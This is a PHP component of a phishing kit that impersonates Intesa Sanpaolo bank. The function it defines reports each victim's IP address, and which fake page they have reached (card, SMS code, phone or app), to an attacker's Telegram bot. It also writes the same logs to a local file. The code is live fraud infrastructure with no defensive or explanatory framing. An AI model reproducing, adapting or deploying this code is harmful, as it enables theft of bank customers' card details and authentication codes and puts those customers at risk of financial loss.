<?php 
require './CONFIG2.php';
include "./IP.INFO.php";

function note($statu){
	global $bot_token;
	global $chat_id;
	$c = curl_init();
	curl_setopt($c, CURLOPT_URL, "https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&parse_mode=html&text=".urlencode($LOGS="<b>••••••••••••••• 🥂 INTESASANPAOLO.STATU 🥂</b>\n[ 🔎 ] * : ".$_SERVER['REMOTE_ADDR']."\n[ ⚙️ ] * : $statu"));
	file_put_contents('../../../ATR480X.html', $LOGS . PHP_EOL, FILE_APPEND);
	curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
	$res =  curl_exec($c);
	curl_close($c);
	
}


if(isset($_POST['appview'])){
	note("📱 AT APP PAGE");
}if(isset($_POST['apperrorview'])){
	note("📱 AT APP ERROR PAGE");
}
if(isset($_POST['cardview'])){
	note("💳 AT CARD PAGE");
}if(isset($_POST['carderrorview'])){
	note("💳 AT CARD ERROR PAGE");
}
if(isset($_POST['smsview'])){
	note("🔑 AT SMS PAGE");
}if(isset($_POST['smserrorview'])){
	note("🔑 AT SMS ERROR PAGE");
}
if(isset($_POST['smsview2'])){
	note("🔑 AT SMS.2 PAGE");
}if(isset($_POST['smserrorview2'])){
	note("🔑 AT SMS.2 PAGE");
}
if(isset($_POST['televiw'])){
	note("☎️ AT PHONE PAGE");
}if(isset($_POST['telerrorview'])){
	note("☎️ AT PHONE ERROR PAGE");
}
if(isset($_POST['smsview3'])){
	note("🔑 AT SMS PAGE");
}if(isset($_POST['smserrorview3'])){
	note("🔑 AT SMS ERROR PAGE");
}
?>